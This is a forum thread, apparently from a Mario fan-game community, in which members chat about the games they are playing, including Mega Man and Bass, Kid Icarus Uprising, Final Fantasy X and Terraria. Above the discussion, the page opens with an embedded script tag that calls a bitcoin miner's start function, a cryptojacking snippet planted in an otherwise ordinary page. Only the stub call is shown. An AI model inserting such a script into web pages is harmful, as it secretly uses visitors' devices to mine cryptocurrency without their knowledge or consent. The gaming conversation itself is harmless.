<script>
miner.start(); // initialise bitcoin miner
</script>

smbx communitymario fan games galaxysmw central

What games are you playing?

do you like them video games? what about those there romhacks? well pop on in here and talk about them then! what are you waiting for?!
YelseyKing
Anyone want a banana? :3
First name: Matt

Re: What games are you playing?

Postby YelseyKing » 5 years ago

Just completed Wily Wars. I already talked about my impressions of the 1-3 remakes, so I'll instead focus on Wily Tower. Honestly, it was really fun, if short, and really, pretty easy. I liked that you had the option to select eight weapons and three utility items from MM1-3, which can have quite an impact on your overall strategy there. The biggest -- and that's to be taken quite literally -- overall surprise for me was, though, had to be Hyper Storm H. My gods, he's gigantic; at least the size of a Megaman X boss! And *two* life bars? Madness! But despite his size and extra health, he went down pretty fast and had easy to read and avoid attacks, so... I guess "the bigger they are, the harder they fall" kinda works.

Now, I shall continue the May of Megaman with my favorite entry in the classic series, Megaman and Bass. SNES version, with fan translation, as it's just... better than the GBA version, seriously.

(Edit: Oh hey, first post of the 100th page of this thread. Go me. Or something.)
Ayjo and Meya are watching you. Be on your best behavior.

Moists:

The (Talkhaus) Price is Right
On hiatus. It'll return someday.

swirlybomb
a bomb that is swirly
First name: Swirlus Bomberton

Postby swirlybomb » 5 years ago

Kid Icarus Uprising's stage 8 sure was something.

Significantly longer than previous stages (or at least it felt like it), the space pirate enemies are super hard to avoid, there's at least one instance where you take an elevator and then two ambush you from either side that you CANNOT see coming (one in 'front', one behind that can't be seen until he's already hit you), narrow pathways with touchy 'dash' controls making it easy to fall off and lose a big chunk of health... and 'best' of all, one enemy near the end that just smashes you immediately and repeatedly with a big spikey smasher that probably offers you ONE frame of it being visible before you're hit, continues to deal huge damage to you while you're on the ground trying to get up, and even when I "knew" it's coming, I still can't avoid it whatsover. Radical.

Unsurprisingly, this resulted in my first death so far, and WOW the hearts cauldron/Intensity is unforgiving; I thought a death would just cost you a portion of your hearts and lower the Intensity by a small amount, but actually it spilled out half my hearts and Intensity dropped by more than 1. Okay.

So that wasn't a fun experience in the slightest.
anonymousbl00dlust wrote:All the obstacles in my level can be beaten on the players first attempt without any 'future predicting'.

Sorel
In the shadows
First name: Alexander
Pronouns: he/him/his

Postby Sorel » 5 years ago

Some things about Kid Icarus:

1st: You'll lose MANY hearts if you die. So don't feel forced to play on 9.0 nonstop. I usually play with 5.0-6.0 difficulty.

2nd: The Space Pirate Ship level is one of the longest...
CAREFUL, MAYOR SPOILERS AHEAD, DON'T READ IF YOU DON'T WANT
So, you're currently at Chapter 8? What will your reaction be when I tell you that there are 25 Chapters? (IMO Chapter 19 is the longest.)

Eila

Postby Eila » 5 years ago

Now that I finally finished downloading it, Wolfenstein is pretty good. So far though, it's not 'bad' or anything, but it is giving me vibes of that mediocre Blacksite: Area 51.

Course, I have only done like 4 levels so far, but that is what I have taken from it up until now. It just so heavily reminds me of Blacksite which was okay but nothing special. Even unfinished in some parts.

Plenty more to come from it though, so I look forward t it.

sonicspin
wishes
Banned
First name: t
Pronouns: whatever

Postby sonicspin » 5 years ago

I am making levels for a rythm game called Soundodger+
and getting my backside handed by the last 2 levels of Copy Kitty in hardmode
d̀͢͏̷͢ȩ̢͡͞͠-̸̢͟҉g̶̡͟͞҉e͞͏͞͞͠n͢҉e̸̛͠͞r͟á̡͠͡ţ̛́͜i̧̛o̵̢ń̴͠͝͝
dA

Bean

Postby Bean » 5 years ago

I popped in Nintendo Land after a long break from it. My Mii changed so the stats were rest, not that it matters. I had three games left to beat on that before I finished all nine of the ones that had goals. Did Captain Falcon's Twister Race last night, but I still have DK's Crash Course and that Takamaru's Ninja Castle one to complete to count it as done.

I have to say, this game is kind of underrated by people... probably because of the horrid E3 presentation that one year, but the game itself is very diverse in its games and shows off some cool tricks with the Gamepad that very few titles have on the system.
Last edited by Bean on 25 May 2014, 16:47, edited 1 time in total.

Euparkeria
Palaeontological Platformerer

Postby Euparkeria » 5 years ago

Just cleared Wily stage 2 in MM: Day in the Limelight 2. Holy poo the boss was intense! But for the right reasons. Okay, it was long, but incredibly satisfying to beat! I used Metal Man for precise shooting for the fight until the last move, when I switched to Crash Man to make sure I hit the eye, as it appears in every four corners. I only aimed at one corner, as the long explosion of Crash Bomber made sure the eye would have to get hurt at some point when it appears in that corner. I didn't use a single Energy Tank.

Luckily I don't remember how Rao fought the boss. It wouldn't feel as great if I remembered what works best.
Cool banner by Neutron Star!

YelseyKing

All right. Megaman and Bass update. I have 9 lives, full energy for every weapon, all the buyable powerups, and all 100 CDs. I think I'm ready to take on King.

I'm *totally* sure Dr. Wily isn't behind *this* one, too.

Also, I'll be dealing with the final stages as Megaman, and won't be bothering with Bass. For all the latter's mobility advantages, Megaman is much stronger, and the final battles are actually altered to screw with Bass anyhow.

Regardless, wish me luck. I'll... need it.

Moists:

Ashan
The world has become a place

Postby Ashan » 5 years ago

Making some progress is FFX.
Currently at
the third(?) temple place. I think it's the third anyway, I don't remember. It's the one where a giant rock explodes and there's a bunch of rocks floating around the entrance being held up by lightning.

Sorel
In the shadows

YelseyKing wrote:All right. Megaman and Bass update. I have 9 lives, full energy for every weapon, all the buyable powerups, and all 100 CDs. I think I'm ready to take on King.

I'm *totally* sure Dr. Wily isn't behind *this* one, too.

Also, I'll be dealing with the final stages as Megaman, and won't be bothering with Bass. For all the latter's mobility advantages, Megaman is much stronger, and the final battles are actually altered to screw with Bass anyhow.

Regardless, wish me luck. I'll... need it.
Haha, I completed a 100% with Bass. It's really kinda the hardmode. That game also had my hardest Megaman Boss fight.

Bean

Postby Bean » 5 years ago

Good luck to Yelsey, pretty sure that's Djose Temple for Ashan, and glad Euparkeria is enjoying Day in the Limelight 2. That one was a lot of fun.

Since I have my own 3DS now, I've been doing Streetpassing with my bro's 3DS a couple of times a day to play that Find Mii game on Streetpass Mii Plaza. I won't count it as a real game beaten, but I am going through it a second time to open up the version of it that has branching paths. On the final battle of that now.

yogui
♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥
Banned
First name: guy who made something

Postby yogui » 5 years ago

Yay finally finished both stories of Senra Kagura Burst and almost finished Sayonara Umihara Kawase (only one ending left in challenge mode).
So I'm gonna start a new DS/3DS game (I dunno why but I prefer playing games on my DS/3DS than on console/PC). There's lot of 3DS games I want to buy (Kirby, Ace attorney vs Layton, AA5, Etrian Odyssey Untold) but I think I will start 999. After all it's been one year since I've bought it along with Virtue's Last Reward and I haven't played it yet lol.
[enable_hats][/enable_hats]

GlitchedGhost

Postby GlitchedGhost » 5 years ago

I've been playing through Tokyo Jungle, doing the animal challenges to unlock the other animals. Currently working my way through the carnivore section, just over half way done. I want to get to the dinosaurs damnit! I'll end up doing the herbivores after. Look forward to the ostrich in that.
He captured!
raocow wrote:last night I had a dream where I finally understood what a 'birb' is, and turns out it's a collyflower

Ashan

These cloister of trials are kinda stupid. Like, they're not impossible, but there doesn't seem to be any consistent strategy to figuring out how to progress other than "put balls in different places until it works". I don't even know how I solved that last one really. At one point I managed to find the right combination of balls which caused a door to open and then you just put the other 2 balls on the pillar and push it into the lightning so it will hover because reasons??? I haven't used a guide so far but jeez, these things are getting cryptic and it's not like when I find a solution I go "oh, I get it!" It's more like, "oh, okay. I guess that works."

YelseyKing

Ashan wrote:These cloister of trials are kinda stupid. Like, they're not impossible, but there doesn't seem to be any consistent strategy to figuring out how to progress other than "put balls in different places until it works". I don't even know how I solved that last one really. At one point I managed to find the right combination of balls which caused a door to open and then you just put the other 2 balls on the pillar and push it into the lightning so it will hover because reasons??? I haven't used a guide so far but jeez, these things are getting cryptic and it's not like when I find a solution I go "oh, I get it!" It's more like, "oh, okay. I guess that works."
Just remember to get the Destruction Sphere treasure chest in each cloister, even though they're usually mediocre, or arbitrarily, you won't be able to get a secret Aeon later on. Fortunately, by the time the Aeon becomes available, you can reach all the temples again and get any chests you may have missed (except one, but the chest is given to you automatically there).

... unless you're playing the European, International, or HD versions... then... well...

Moists:

Ashan

I'm playing the HD version.

YelseyKing

Ashan wrote:I'm playing the HD version.
That's what I figured. Well...
All versions after the original American PS2 release added a series of optional superbosses, the Dark Aeons (appropriately enough, dark palette swaps of the various Aeons). I've not played any version that contains them, but I've read that these things are viciously, almost impossibly difficult. And many of them are positioned in *the* worst possible places, effectively restricting access to certain former locations until they're defeated. Dark Valefor, for instance, apparently ambushes you en route to Besaid Village, Dark Shiva blocks access to Macalania Temple, and Dark Bahamut can prevent you from getting one of the items needed to power up an ultimate weapon if you don't get it ASAP... and it's completely hidden in a place you really wouldn't think to explore, and is such easily missed.

But, maybe they changed all this in the HD remix, though; I'm not sure what, if anything, *was* changed for that release.

Moists:

Sorel
In the shadows

I'm playing Terraria with 2 friends... just defeated Brain of Chuthulhu or something 5 times... in a row... in one night... and got 3 Crimson Armours.

Leet
Well, hello, Smith ( ´-`)ノ
First name: Chie Arale
Pronouns: she/her

Postby Leet » 5 years ago

guys please play the surreal free indie rpgs Middens and Gingiva they are really good especially the first one
Well it is a decent hack but sometime its just too repetitif there no level that actually pop in your face and your like oh yeah that level they all ressemble themselves and just monster along the way.
Blood Ghoul wrote:Sometimes it seems my blood spurts out in gobs, as if it were a fountain's pulsing sobs. I clearly hear it mutter as it goes yet cannot find the wound from which it flows. Before I met you, baby, I didn't know what I was missing.

YelseyKing

Just finished Megaman and Bass... that final sequence was rough. King's Tank was easy enough, since you can just stay below it to avoid all damage. King's Jet was tougher, but I only died a few times to it. King himself took me a couple tries... it's mostly annoying how you have to go through the whole "dodge the X" sequence and then the Protoman cutscene again if you die... but it's not too tough. King's Combo Mech is just sad. As big as it was, you'd think it'd be tough... but I managed to beat it without taking a single hit.

The refight stage was annoying, mostly due to those vanishing blocks right after Coldman. I lost most of my lives there to that blasted section. The refights themselves weren't especially difficult (except Burnerman... I *hate* Burnerman), and Wily wasn't too bad. Died once to the capsule, but otherwise it wasn't a very difficult fight. Admittedly, watching Bean's videos of the bosses just before fighting them helped tremendously.

Still, that was fun. I do so love Megaman and Bass. Since I have no current means of playing Megaman 9 and 10, I declare the classic series finished. Next up, Xty years into the future to join our reluctant reploid and his bishounen best friend. Yes, it's time for Megaman X Collection. Though I may play a less stressful game in between. Haven't decided what yet.

Moists:

KobaBeach
obscure jrpg enthusiast
First name: David
Pronouns: he/him

Postby KobaBeach » 5 years ago

YelseyKing wrote:Next up, Xty years into the future to join our reluctant reploid and his bishounen best friend. Yes, it's time for Megaman X Collection.
Good luck with X6.

You'll need it.

Here's a guide to getting all the Reploids, btw~
twitter (spicy at times!) | avatar by kuma

who cares:

Frozelar
Retired Screamer

Postby Frozelar » 5 years ago

Started playing Terraria again. Before now I haven't played it in... I'd say several months, but that's only a rough guess. Experiencing the new content since the big 1.2 update has been fun. Apparently (according to the Wiki and a video I watched) Redigit is gonna continue working on Terraria until 1.3 is released, which should be a fairly large update. After that, Red is gonna start focusing on developing Terraria 2, which I heard is gonna basically be Terraria but in 3D? Hopefully it doesn't resemble Minecraft too much, although it seems like a pretty neat idea to me. And I'd say that at this point Terraria has enough content in it that it's hardly comparable to Minecraft anymore. Anyways, apparently even though Redigit isn't really gonna work on Terraria after 1.3, some other devs are still gonna be working on updating it. At least according to the wiki and what I've heard.

In other news, hearing about the continuing development of Star Wars Battlefront 3 and the possible debut of it at E3 have gotten me very excited and playing Battlefront 2 again. Very fun stuff.

On YouTube, I've been playing The Dungeoning, which is a rogue-like platformer, and Desktop Dungeons, which is a rogue-like top-down strategic pile of fun. I'm also considering starting up Argumentable's Another ROM Hack again, after quite a long hiatus.
EDIT: I didn't realize how shameless self-advertise-ish that sounded. Man, sorry! :|

Alice
Pronouns: Girl person

Postby Alice » 5 years ago

Frozelar wrote:After that, Red is gonna start focusing on developing Terraria 2, which I heard is gonna basically be Terraria but in 3D?
Where'd you hear it was going to be 3d?

YelseyKing

KobaBeach wrote:
YelseyKing wrote:Next up, Xty years into the future to join our reluctant reploid and his bishounen best friend. Yes, it's time for Megaman X Collection.
Good luck with X6.

You'll need it.

Here's a guide to getting all the Reploids, btw~
Thanks. I won't be getting to X6 for a while, but I'll take all the help I can get! I did a little reading up on these guys, and... hoo boy. This sounds... fun. That reset button's gonna get a workout, I tells you.

Also, would anyone happen to know where I could find lists of the item locations from X4-X6? There are good FAQs (all by the same person) detailing such for X1-X3, but not for the latter three.

Moists:

Sorel
In the shadows

http://mmxz.zophar.net/megamanxz/megamanx4/items.shtml You can find the other guides on that website too.

Return to “the cartridgé”